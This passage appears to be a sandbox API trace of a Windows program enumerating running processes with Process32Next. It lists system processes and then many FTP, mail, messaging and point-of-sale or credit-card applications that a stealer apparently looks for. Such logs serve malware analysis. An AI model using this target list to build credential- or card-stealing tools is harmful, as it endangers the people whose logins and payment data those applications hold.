lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.911] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0211.914] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.916] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.919] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.921] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.924] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.927] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.929] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.932] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0211.980] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0211.983] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.986] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0211.989] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.991] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0211.994] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0211.996] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0212.000] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0212.002] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0212.005] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0212.008] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.010] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.013] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0212.015] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.065] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.067] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0212.070] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0212.073] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0212.076] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0212.078] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0212.081] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0212.084] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0212.086] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0212.088] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0212.091] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0212.094] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0212.096] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0212.101] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0212.105] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0212.108] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0212.110] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0212.113] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0212.116] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0212.118] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0212.121] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0212.124] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0212.126] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0212.129] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0212.132] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0212.135] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0212.182] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0212.185] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0212.188] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0212.191] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0212.194] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0212.197] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0212.200] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0212.203] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0212.206] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0212.209] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0212.212] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0212.215] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0212.226] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0212.230] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0212.232] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0212.235] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0212.238] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0212.241] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0212.245] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0212.249] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0212.251] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0212.254] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0212.257] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0212.259] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0212.264] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0212.267] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0212.270] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0212.273] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0212.275] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0212.277] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0212.279] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0212.282] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0212.284] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0212.286] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0212.288] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0212.290] Process32Next (in: hSnapshot=0x2130, lppe=0x102efe20 